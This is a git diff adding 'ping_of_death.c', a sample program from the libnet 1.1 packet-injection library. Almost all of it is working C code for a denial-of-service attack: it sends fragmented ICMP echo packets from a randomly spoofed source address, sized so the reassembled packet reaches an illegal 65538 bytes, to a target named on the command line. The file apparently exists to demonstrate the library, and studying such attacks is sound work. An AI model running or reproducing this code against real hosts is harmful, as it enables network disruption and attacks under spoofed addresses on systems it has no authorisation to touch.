diff options
Diffstat (limited to 'libnet/sample/ping_of_death.c')
-rw-r--r-- | libnet/sample/ping_of_death.c | 171 |
1 files changed, 171 insertions, 0 deletions
diff --git a/libnet/sample/ping_of_death.c b/libnet/sample/ping_of_death.c new file mode 100644 index 0000000..b71cb05 --- /dev/null +++ b/libnet/sample/ping_of_death.c @@ -0,0 +1,171 @@ +/* + * $Id: ping_of_death.c,v 1.2 2004/01/03 20:31:01 mike Exp $ + * + * libnet 1.1 + * ICMP ping of death attack + * + * Copyright (c) 1998 - 2004 Mike D. Schiffman <mike@infonexus.com> + * All rights reserved. + * + * Copyright (c) 1999 - 2001 Dug Song <dugsong@monkey.org> + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions + * are met: + * 1. Redistributions of source code must retain the above copyright + * notice, this list of conditions and the following disclaimer. + * 2. Redistributions in binary form must reproduce the above copyright + * notice, this list of conditions and the following disclaimer in the + * documentation and/or other materials provided with the distribution. + * + * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND + * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE + * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS + * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) + * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT + * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY + * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF + * SUCH DAMAGE. + * + */ + +#if (HAVE_CONFIG_H) +#include "../include/config.h" +#endif +#include "./libnet_test.h" + + +#define FRAG_LEN 1472 + +int +main(int argc, char **argv) +{ + libnet_t *l; + libnet_ptag_t ip; + libnet_ptag_t icmp; + struct libnet_stats ls; + u_long fakesrc, target; + u_char *data; + int c, i, flags, offset, len; + char errbuf[LIBNET_ERRBUF_SIZE]; + + printf("libnet 1.1 Ping of Death[raw]\n"); + + /* + * Initialize the library. Root priviledges are required. + */ + l = libnet_init( + LIBNET_RAW4, /* injection type */ + NULL, /* network interface */ + errbuf); /* errbuf */ + + if (l == NULL) + { + fprintf(stderr, "libnet_init() failed: %s\n", errbuf); + exit(EXIT_FAILURE); + } + + if (argc != 2 || ((target = libnet_name2addr4(l, argv[1], LIBNET_RESOLVE) == -1))) + { + fprintf(stderr, "Usage: %s <target>\n", argv[0]); + exit(EXIT_FAILURE); + } + + /* get random src addr. */ + libnet_seed_prand(l); + fakesrc = libnet_get_prand(LIBNET_PRu32); + + data = malloc(FRAG_LEN); + for (i = 0 ; i < FRAG_LEN ; i++) + { + /* fill it with something */ + data[i] = 0x3a; + } + + ip = LIBNET_PTAG_INITIALIZER; + icmp = LIBNET_PTAG_INITIALIZER; + + for (i = 0 ; i < 65536 ; i += (LIBNET_ICMPV4_ECHO_H + FRAG_LEN)) + { + offset = i; + flags = 0; + + if (offset < 65120) + { + flags = IP_MF; + len = FRAG_LEN; + } + else + { + /* for a total reconstructed length of 65538 bytes */ + len = 410; + } + + icmp = libnet_build_icmpv4_echo( + ICMP_ECHO, /* type */ + 0, /* code */ + 0, /* checksum */ + 666, /* id */ + 666, /* sequence */ + data, /* payload */ + len, /* payload size */ + l, /* libnet handle */ + icmp); /* libnet ptag */ + if (icmp == -1) + { + fprintf(stderr, "Can't build ICMP header: %s\n", libnet_geterror(l)); + goto bad; + } + /* no reason to do this */ + libnet_toggle_checksum(l, icmp, 0); + + ip = libnet_build_ipv4( + LIBNET_IPV4_H + LIBNET_ICMPV4_ECHO_H + len, /* length */ + 0, /* TOS */ + 666, /* IP ID */ + flags | (offset >> 3), /* IP Frag */ + 64, /* TTL */ + IPPROTO_ICMP, /* protocol */ + 0, /* checksum */ + fakesrc, /* source IP */ + target, /* destination IP */ + NULL, /* payload */ + 0, /* payload size */ + l, /* libnet handle */ + ip); /* libnet ptag */ + if (ip == -1) + { + fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l)); + goto bad; + } + + c = libnet_write(l); + if (c == -1) + { + fprintf(stderr, "Write error: %s\n", libnet_geterror(l)); + } + + /* tcpdump-style jonks. */ + printf("%s > %s: (frag 666:%d@%d%s)\n", libnet_addr2name4(fakesrc,0), + argv[1], LIBNET_ICMPV4_ECHO_H + len, offset, flags ? "+" : ""); + } + + libnet_stats(l, &ls); + fprintf(stderr, "Packets sent: %lld\n" + "Packet errors: %lld\n" + "Bytes written: %lld\n", + ls.packets_sent, ls.packet_errors, ls.bytes_written); + libnet_destroy(l); + free(data); + return (EXIT_SUCCESS); +bad: + libnet_destroy(l); + free(data); + return (EXIT_FAILURE); +} + +/* EOF */ |